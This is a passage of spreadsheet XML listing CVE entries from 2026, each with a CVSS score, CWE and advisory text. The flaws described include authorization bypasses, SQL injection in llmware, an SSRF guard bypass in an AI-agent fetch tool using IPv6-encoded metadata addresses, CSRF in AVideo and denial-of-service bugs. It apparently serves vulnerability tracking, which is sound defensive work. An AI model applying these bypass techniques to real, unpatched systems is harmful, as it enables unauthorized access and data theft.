          <t>potpie through 2.0.0 fails to verify user ownership on the POST /conversations/{conversation_id}/code-changes/sync endpoint. Authenticated attackers can write arbitrary file changes into other users' conversations by supplying their conversation IDs, allowing unauthorized modification of pending changes.</t>
        </is>
      </c>
      <c r="M3304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85669</t>
        </is>
      </c>
    </row>
    <row r="3305">
      <c r="A3305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85689</t>
        </is>
      </c>
      <c r="C3305" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3305" s="5" t="inlineStr"/>
      <c r="F3305" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3305" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H3305" s="5" t="inlineStr"/>
      <c r="I3305" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3305" s="5" t="inlineStr"/>
      <c r="K3305" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3305" s="5" t="inlineStr">
        <is>
          <t>llmware 0.4.6 contains an SQL injection vulnerability in the collection-database layer (llmware/resources.py) where filter and lookup values are directly string-interpolated into SQL WHERE clauses without parameterization or escaping, in both the SQLite and PostgreSQL backends. The filter validator only checks keys against an allow-list and never sanitizes values. Attacker-controlled filter values reaching the public API via Library.block_lookup and Query.text_query_with_custom_filter / text_query_by_author_or_speaker can neutralize the intended filter to disclose rows the caller was scoped out of (cross-document/cross-collection disclosure); on PostgreSQL the flaw permits boolean- and UNION-based SQL injection.</t>
        </is>
      </c>
      <c r="M3305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85689</t>
        </is>
      </c>
    </row>
    <row r="3306">
      <c r="A3306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85692</t>
        </is>
      </c>
      <c r="C3306" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3306" s="5" t="inlineStr"/>
      <c r="F3306" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3306" s="5" t="inlineStr"/>
      <c r="H3306" s="5" t="inlineStr"/>
      <c r="I3306" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3306" s="5" t="inlineStr"/>
      <c r="K3306" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3306" s="5" t="inlineStr">
        <is>
          <t>Nightingale (n9e), as of commit 8362cbe (main branch, confirmed 2026-08-27), contains a server-side request forgery vulnerability in the isPublicIP function in aiagent/tools/http.go, the SSRF guard for the http_fetch AI-agent tool. The function only unwraps standard IPv4-mapped (::ffff:a.b.c.d) IPv6 addresses before checking them against the forbidden-range list, and does not classify 6to4 (2002::/16), NAT64 (64:ff9b::/96, 64:ff9b:1::/48), or deprecated site-local (fec0::/10) addresses. On a dual-stack or NAT64-enabled host, an attacker able to supply a URL to the http_fetch tool can bypass the guard by encoding a forbidden IPv4 address (such as the cloud instance-metadata endpoint 169.254.169.254) in one of these IPv6 forms to reach internal or metadata services.</t>
        </is>
      </c>
      <c r="M3306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85692</t>
        </is>
      </c>
    </row>
    <row r="3307">
      <c r="A3307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85787</t>
        </is>
      </c>
      <c r="C3307" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3307" s="5" t="inlineStr"/>
      <c r="F3307" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3307" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H3307" s="5" t="inlineStr"/>
      <c r="I3307" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3307" s="5" t="inlineStr"/>
      <c r="K3307" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L3307" s="5" t="inlineStr">
        <is>
          <t>An incomplete list of disallowed inputs in the SQL validation component in Amazon awslabs postgres-mcp-server before  version 1.1.7 might allow an unauthenticated actor to modify data beyond the read-only scope by placing crafted SQL into the content that is submitted when an authenticated user interacts with the MCP server.
To remediate this issue, users should upgrade to version 1.1.7 or above.</t>
        </is>
      </c>
      <c r="M3307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85787</t>
        </is>
      </c>
    </row>
    <row r="3308">
      <c r="A3308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86081</t>
        </is>
      </c>
      <c r="C3308" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3308" s="5" t="inlineStr"/>
      <c r="F3308" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3308" s="5" t="inlineStr"/>
      <c r="H3308" s="5" t="inlineStr"/>
      <c r="I3308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3308" s="5" t="inlineStr"/>
      <c r="K3308" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L3308" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Git node clone operation matched an attacker-controlled destination path against the default N8N_BLOCK_FILE_PATTERNS regular expression. The pattern ^(./).git(/.)$ allowed catastrophic backtracking and ran synchronously in the main n8n process. An authenticated workflow editor could therefore freeze the instance with one workflow execution; the affected default is declared in packages/@n8n/config/src/configs/security.config.ts. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M3308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86081</t>
        </is>
      </c>
    </row>
    <row r="3309">
      <c r="A3309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86082</t>
        </is>
      </c>
      <c r="C3309" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3309" s="5" t="inlineStr"/>
      <c r="F3309" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3309" s="5" t="inlineStr"/>
      <c r="H3309" s="5" t="inlineStr"/>
      <c r="I3309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3309" s="5" t="inlineStr"/>
      <c r="K3309" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3309" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the OpenAI Chat Model node enforced credential allowed-domain restrictions for normal calls but not for the model-search dropdown. A workflow editor could set options.baseURL to an arbitrary host and make the searchModels path send the openAiApi credential there. The affected implementation is packages/@n8n/nodes-langchain/nodes/llms/LMChatOpenAi/methods/loadModels.ts, which omitted assertOpenAiCredentialAllowsUrl. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M3309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86082</t>
        </is>
      </c>
    </row>
    <row r="3310">
      <c r="A3310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86091</t>
        </is>
      </c>
      <c r="C3310" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3310" s="5" t="inlineStr"/>
      <c r="F3310" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3310" s="5" t="inlineStr"/>
      <c r="H3310" s="5" t="inlineStr"/>
      <c r="I3310" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3310" s="5" t="inlineStr"/>
      <c r="K3310" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3310" s="5" t="inlineStr">
        <is>
          <t>ntopng before 6.7.260717 fails to check user privileges in the pools bulk-delete endpoint, allowing authenticated non-administrators to delete all host pools and member bindings. Attackers can issue POST requests to the delete pools endpoint to irreversibly destroy every host pool, removing traffic policy bindings and visibility restrictions that may bypass security policies.</t>
        </is>
      </c>
      <c r="M3310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86091</t>
        </is>
      </c>
    </row>
    <row r="3311">
      <c r="A3311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86097</t>
        </is>
      </c>
      <c r="C3311" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3311" s="5" t="inlineStr"/>
      <c r="F3311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3311" s="5" t="inlineStr"/>
      <c r="H3311" s="5" t="inlineStr"/>
      <c r="I3311" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3311" s="5" t="inlineStr"/>
      <c r="K3311" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3311" s="5" t="inlineStr">
        <is>
          <t>PX4 Autopilot through 1.17.0 contains a null pointer dereference vulnerability in param_set_default_file() and param_set_backup_file() functions that allows attackers to crash the autopilot process. Attackers can invoke 'param select' or 'param select-backup' commands with no path argument from any PX4 shell to trigger the crash.</t>
        </is>
      </c>
      <c r="M3311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86097</t>
        </is>
      </c>
    </row>
    <row r="3312">
      <c r="A3312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86111</t>
        </is>
      </c>
      <c r="C3312" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3312" s="5" t="inlineStr"/>
      <c r="F3312" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3312" s="5" t="inlineStr"/>
      <c r="H3312" s="5" t="inlineStr"/>
      <c r="I3312" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3312" s="5" t="inlineStr"/>
      <c r="K3312" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3312" s="5" t="inlineStr">
        <is>
          <t>BookWyrm through 0.9.1 fails to validate user visibility permissions in the status edit endpoint, allowing authenticated attackers to read followers-only and direct-message reviews by enumerating sequential status IDs. Attackers can access the raw content of restricted statuses through the edit view, bypassing the privacy protections documented for these message types.</t>
        </is>
      </c>
      <c r="M3312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86111</t>
        </is>
      </c>
    </row>
    <row r="3313">
      <c r="A3313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86113</t>
        </is>
      </c>
      <c r="C3313" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3313" s="5" t="inlineStr"/>
      <c r="F3313" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3313" s="5" t="inlineStr"/>
      <c r="H3313" s="5" t="inlineStr"/>
      <c r="I3313" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3313" s="5" t="inlineStr"/>
      <c r="K3313" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3313" s="5" t="inlineStr">
        <is>
          <t>BookWyrm through 0.9.1 contains an authorization bypass vulnerability in the edit_readthrough function that allows authenticated users to modify other users' reading records. Attackers can exploit sequential ReadThrough IDs to overwrite arbitrary users' start dates, finish dates, progress, and progress mode, affecting reading statistics and exported data.</t>
        </is>
      </c>
      <c r="M3313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86113</t>
        </is>
      </c>
    </row>
    <row r="3314">
      <c r="A3314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86116</t>
        </is>
      </c>
      <c r="C3314" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3314" s="5" t="inlineStr"/>
      <c r="F3314" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3314" s="5" t="inlineStr"/>
      <c r="H3314" s="5" t="inlineStr"/>
      <c r="I3314" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3314" s="5" t="inlineStr"/>
      <c r="K3314" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3314" s="5" t="inlineStr">
        <is>
          <t>Metabase versions before 0.63.1 fail to enforce data analyst permission checks on glossary API endpoints, allowing any authenticated user to create, modify, and delete glossary entries. Attackers can submit requests to POST, PUT, and DELETE glossary endpoints to tamper with instance-wide business glossary data without proper authorization.</t>
        </is>
      </c>
      <c r="M3314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86116</t>
        </is>
      </c>
    </row>
    <row r="3315">
      <c r="A3315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86175</t>
        </is>
      </c>
      <c r="C3315" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3315" s="5" t="inlineStr"/>
      <c r="F3315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3315" s="5" t="inlineStr"/>
      <c r="H3315" s="5" t="inlineStr"/>
      <c r="I3315" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3315" s="5" t="inlineStr"/>
      <c r="K3315" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3315" s="5" t="inlineStr">
        <is>
          <t>NetBox through 4.7.0 fails to redact sensitive data source backend credentials in REST and GraphQL API responses. Authenticated users with only view permission can retrieve plaintext passwords and secret keys for Git and Amazon S3 backends through API endpoints, gaining unauthorized access to external repositories and storage buckets.</t>
        </is>
      </c>
      <c r="M3315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86175</t>
        </is>
      </c>
    </row>
    <row r="3316">
      <c r="A3316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86192</t>
        </is>
      </c>
      <c r="C3316" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3316" s="5" t="inlineStr"/>
      <c r="F3316" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3316" s="5" t="inlineStr"/>
      <c r="H3316" s="5" t="inlineStr"/>
      <c r="I3316" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3316" s="5" t="inlineStr"/>
      <c r="K3316" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3316" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 fail to properly filter private attribute-view cell values in the getAttributeViewKeys endpoint. Publish readers can retrieve hidden KeyValues payloads from rows bound to inaccessible documents, exposing private database contents without authorization.</t>
        </is>
      </c>
      <c r="M3316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86192</t>
        </is>
      </c>
    </row>
    <row r="3317">
      <c r="A3317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86204</t>
        </is>
      </c>
      <c r="C3317" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3317" s="5" t="inlineStr"/>
      <c r="F3317" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3317" s="5" t="inlineStr"/>
      <c r="H3317" s="5" t="inlineStr"/>
      <c r="I3317" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3317" s="5" t="inlineStr"/>
      <c r="K3317" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3317" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.39.2 fail to limit JSON payload size in ModalFormResponsePacket handling, allowing authenticated players to cause denial of service. Attackers can send modal form response packets with massive JSON arrays to exhaust server memory and CPU resources, rendering the server unresponsive.</t>
        </is>
      </c>
      <c r="M3317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86204</t>
        </is>
      </c>
    </row>
    <row r="3318">
      <c r="A3318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86255</t>
        </is>
      </c>
      <c r="C3318" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3318" s="5" t="inlineStr"/>
      <c r="F3318" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3318" s="5" t="inlineStr"/>
      <c r="H3318" s="5" t="inlineStr"/>
      <c r="I3318" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3318" s="5" t="inlineStr"/>
      <c r="K3318" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3318" s="5" t="inlineStr">
        <is>
          <t>wger before 2.5 fails to validate the maximum duration of routine date ranges, allowing authenticated users to create routines spanning arbitrarily long periods. Attackers can trigger the date_sequence computation via routine detail endpoints, forcing the server to iterate thousands of times per request and exhaust worker threads, denying service to legitimate users.</t>
        </is>
      </c>
      <c r="M3318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86255</t>
        </is>
      </c>
    </row>
    <row r="3319">
      <c r="A3319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86283</t>
        </is>
      </c>
      <c r="C3319" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3319" s="5" t="inlineStr"/>
      <c r="F3319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3319" s="5" t="inlineStr"/>
      <c r="H3319" s="5" t="inlineStr"/>
      <c r="I3319" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3319" s="5" t="inlineStr"/>
      <c r="K3319" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="L3319" s="5" t="inlineStr">
        <is>
          <t>MISP's UiBeta theme collection view (app/View/Themed/UiBeta/Collections/view.ctp) performed a secondary query of member events by UUID without applying the caller's access control list (ACL). The CollectionsController::view() action correctly resolved collection element UUIDs through Event::fetchSimpleEvents($user, ...), which enforces per-user event ACL. However, the view template independently re-queried the same UUIDs using only an Event.uuid IN (...) condition, omitting the createEventConditions() authorization filter. Because collection element UUIDs are stored without server-side authorization against the referenced event (CollectionElementsController::add() accepts whatever UUID the collection owner posts), an authenticated user with view access to a collection could retrieve full details of events they are not permitted to read. The exposed data included event identifiers, info, dates, timestamps, creator organization, all event tags, and galaxy clusters (the latter attached via a cluster-scoped rather than event-scoped ACL check). This constitutes an authorization bypass at the presentation layer, allowing horizontal privilege escalation across event boundaries within the MISP instance.</t>
        </is>
      </c>
      <c r="M3319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86283</t>
        </is>
      </c>
    </row>
    <row r="3320">
      <c r="A3320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86347</t>
        </is>
      </c>
      <c r="C3320" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3320" s="5" t="inlineStr"/>
      <c r="F3320" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3320" s="5" t="inlineStr"/>
      <c r="H3320" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I3320" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3320" s="5" t="inlineStr"/>
      <c r="K3320" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-862</t>
        </is>
      </c>
      <c r="L3320" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP allow any authenticated user to access TemplatesController::uploadFile() because the ACL entry for templates/uploadFile used the wildcard *. This bypasses the intended role restrictions applied to neighboring template-management operations.
The upload handler accepts arbitrary content with only minimal checks and writes it into app/tmp/files/. A low-privileged or read-only user can therefore repeatedly upload files and consume server disk space without requiring perm_add or perm_template. The fix changes the ACL requirement from * to perm_add.
The commit also rules out stronger impacts: uploaded files receive random names, path traversal/predictable overwrite is not available, the temporary directory is outside the web root, and the files are not directly served over HTTP. Therefore, the issue should not be described as arbitrary file overwrite, stored XSS, or RCE.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M3320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86347</t>
        </is>
      </c>
    </row>
    <row r="3321">
      <c r="A3321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86408</t>
        </is>
      </c>
      <c r="C3321" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3321" s="5" t="inlineStr"/>
      <c r="F3321" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3321" s="5" t="inlineStr"/>
      <c r="H3321" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I3321" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3321" s="5" t="inlineStr"/>
      <c r="K3321" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L3321" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP do not enforce parent-event visibility when serving cryptographic keys through CryptographicKeysController::view().
The vulnerable handler queried CryptographicKey directly using the supplied key ID and selected sensitive fields such as:
  *  
type
  *  
key_data
  *  
fingerprint
but did not fetch or authorize the associated parent event first.
The upstream commit explicitly states that cryptographicKeys/view could return a protected event’s signing key to any authenticated user.
The fix adds parent_id and parent_type to the lookup and then enforces authorization through the associated event using fetchSimpleEvent($user, parent_id). If the parent is not an Event, access is limited to site administrators.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M3321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86408</t>
        </is>
      </c>
    </row>
    <row r="3322">
      <c r="A3322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86713</t>
        </is>
      </c>
      <c r="C3322" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3322" s="5" t="inlineStr"/>
      <c r="F3322" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3322" s="5" t="inlineStr"/>
      <c r="H3322" s="5" t="inlineStr"/>
      <c r="I3322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3322" s="5" t="inlineStr"/>
      <c r="K3322" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3322" s="5" t="inlineStr">
        <is>
          <t>PX4 Autopilot through 1.17.0 contains a use-after-free vulnerability in the load_mon module's stop path where exit_and_cleanup() deletes the LoadMon object and frees the performance counter before perf_end() attempts to access it. Attackers can trigger this vulnerability by issuing the load_mon stop command from any PXH or MAVLink shell, causing reads and writes through freed memory that corrupt heap objects and destabilize the flight stack.</t>
        </is>
      </c>
      <c r="M3322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86713</t>
        </is>
      </c>
    </row>
    <row r="3323">
      <c r="A3323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86718</t>
        </is>
      </c>
      <c r="C3323" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3323" s="5" t="inlineStr"/>
      <c r="F3323" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3323" s="5" t="inlineStr"/>
      <c r="H3323" s="5" t="inlineStr"/>
      <c r="I3323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3323" s="5" t="inlineStr"/>
      <c r="K3323" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3323" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in deleteHistory.json.php and finishAll.json.php that allows unauthenticated attackers to mutate live history by making GET requests without CSRF token validation. Attackers can craft malicious pages that trigger administrator browsers to delete all live transmission history or mark streams as finished when an admin visits the attacker-controlled site.</t>
        </is>
      </c>
      <c r="M3323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86718</t>
        </is>
      </c>
    </row>
    <row r="3324">
      <c r="A3324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86724</t>
        </is>
      </c>
      <c r="C3324" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3324" s="5" t="inlineStr"/>
      <c r="F3324" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3324" s="5" t="inlineStr"/>
      <c r="H3324" s="5" t="inlineStr"/>
      <c r="I3324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3324" s="5" t="inlineStr"/>
      <c r="K3324" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3324" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in plugin/YPTWallet/view/saveBalance.php that allows attackers to set arbitrary wallet balances by relying only on session cookies without token validation. Attackers can craft a malicious webpage that, when loaded by an administrator, submits a POST request to modify any user's wallet balance to any value.</t>
        </is>
      </c>
      <c r="M3324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86724</t>
        </is>
      </c>
    </row>
    <row r="3325">
      <c r="A3325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
